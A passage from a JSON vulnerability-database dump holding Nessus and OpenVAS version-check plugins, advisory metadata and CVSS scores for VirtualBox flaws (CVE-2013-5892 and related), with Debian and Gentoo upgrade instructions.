leak.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=735410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/virtualbox\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2878\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the virtualbox packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source\npackage.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 4.1.18-dfsg-2+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"virtualbox\", reference:\"3.2.10-dfsg-1+squeeze2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-dbg\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-fuse\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-utils\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-guest-x11\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-dbg\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-fuse\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-dkms\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-utils\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-guest-x11\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-qt\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-ose-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-qt\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"virtualbox-source\", reference:\"4.1.18-dfsg-2+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:deb_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:51:31", "description": "The remote host is affected by the vulnerability described in GLSA-201401-13 (VirtualBox: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Virtualbox. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A local attacker in a guest virtual machine may be able to escalate privileges or cause a Denial of Service condition.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": null, "vector": null}, "published": "2014-01-21T00:00:00", "type": "nessus", "title": "GLSA-201401-13 : VirtualBox: Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3221", "CVE-2013-5892", "CVE-2014-0404", "CVE-2014-0405", "CVE-2014-0406", "CVE-2014-0407"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:virtualbox", "p-cpe:/a:gentoo:linux:virtualbox-bin", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201401-13.NASL", "href": "https://www.tenable.com/plugins/nessus/72052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201401-13.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(72052);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-3221\", \"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0405\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_bugtraq_id(56045, 64900, 64905, 64909, 64911, 64913);\n script_xref(name:\"GLSA\", value:\"201401-13\");\n\n script_name(english:\"GLSA-201401-13 : VirtualBox: Multiple Vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201401-13\n(VirtualBox: Multiple Vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Virtualbox. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A local attacker in a guest virtual machine may be able to escalate\n privileges or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201401-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All virtualbox users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-emulation/virtualbox-4.2.22'\n All virtualbox-bin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=app-emulation/virtualbox-bin-4.2.22'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:virtualbox-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-emulation/virtualbox-bin\", unaffected:make_list(\"ge 4.2.22\"), vulnerable:make_list(\"lt 4.2.22\"))) flag++;\nif (qpkg_check(package:\"app-emulation/virtualbox\", unaffected:make_list(\"ge 4.2.22\"), vulnerable:make_list(\"lt 4.2.22\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:qpkg_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"VirtualBox\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-06-07T18:54:46", "description": "Unspecified vulnerability in the Oracle VM VirtualBox component in Oracle Virtualization VirtualBox prior to 3.2.20, 4.0.22, 4.1.30, 4.2.22, and 4.3.6 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Core.", "cvss3": {}, "published": "2014-01-15T16:08:00", "type": "debiancve", "title": "CVE-2013-5892", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:L/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5892"], "modified": "2014-01-15T16:08:00", "id": "DEBIANCVE:CVE-2013-5892", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5892", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2020-05-15T17:26:01", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "cvss3": {}, "published": "2014-01-23T00:00:00", "type": "openvas", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2020-05-12T00:00:00", "id": "OPENVAS:1361412562310804193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804193", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804193\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:35:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_oracle_virtualbox_detect_macosx.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T17:26:48", "description": "This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.", "cvss3": {}, "published": "2014-01-23T00:00:00", "type": "openvas", "title": "Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5892"], "modified": "2020-05-12T00:00:00", "id": "OPENVAS:1361412562310804192", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804192", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804192\");\n script_version(\"2020-05-12T13:57:17+0000\");\n script_cve_id(\"CVE-2013-5892\");\n script_bugtraq_id(64909);\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-05-12 13:57:17 +0000 (Tue, 12 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-01-23 10:29:12 +0530 (Thu, 23 Jan 2014)\");\n script_name(\"Oracle VM VirtualBox Unspecified Vulnerability-01 Jan2014 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Oracle VM VirtualBox and is prone to\n unspecified vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to unspecified errors related to 'core' subcomponent.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow local users to affect confidentiality,\n integrity, and availability via unknown vectors.\");\n\n script_tag(name:\"affected\", value:\"Oracle VM VirtualBox before version 3.2.20, before version 4.0.22, before\n version 4.1.30, before version 4.2.22 and before version 4.3.6 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56490\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_sun_virtualbox_detect_win.nasl\");\n script_mandatory_keys(\"Oracle/VirtualBox/Win/Ver\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\ncpe_list = make_list(\"cpe:/a:oracle:vm_virtualbox\", \"cpe:/a:sun:virtualbox\");\n\nif(!infos = get_app_version_and_location_from_list(cpe_list:cpe_list, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_in_range(version:vers, test_version:\"3.2.0\", test_version2:\"3.2.19\")||\n version_in_range(version:vers, test_version:\"4.0.0\", test_version2:\"4.0.21\")||\n version_in_range(version:vers, test_version:\"4.1.0\", test_version2:\"4.1.29\")||\n version_in_range(version:vers, test_version:\"4.2.0\", test_version2:\"4.2.21\")||\n version_in_range(version:vers, test_version:\"4.3.0\", test_version2:\"4.3.5\")) {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:25", "description": "Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.", "cvss3": {}, "published": "2014-03-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2878-1 (virtualbox - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0404", "CVE-2014-0406", "CVE-2014-0407", "CVE-2013-5892"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310702878", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702878", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2878.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2878-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702878\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2013-5892\", \"CVE-2014-0404\", \"CVE-2014-0406\", \"CVE-2014-0407\");\n script_name(\"Debian Security Advisory DSA 2878-1 (virtualbox - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-13 00:00:00 +0100 (Thu, 13 Mar 2014)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:S/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2878.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"virtualbox on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 3.2.10-dfsg-1+squeeze2 of the virtualbox-ose source package.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.1.18-dfsg-2+deb7u2.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.3.6-dfsg-1.\n\nWe recommend that you upgrade your virtualbox packages.\");\n script_tag(name:\"summary\", value:\"Matthew Daley discovered multiple vulnerabilities in VirtualBox, a x86\nvirtualisation solution, resulting in denial of service, privilege\nescalation and an information leak.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"3.2.10-dfsg-1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dbg\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-fuse\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-dkms\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-utils\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-guest-x11\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-ose-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-qt\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"virtualbox-source\", ver:\"4.1.18-dfsg-2+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.5, "vector": "AV:L/AC:H/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2017-08-01T10:48:45", "description": "Matthew 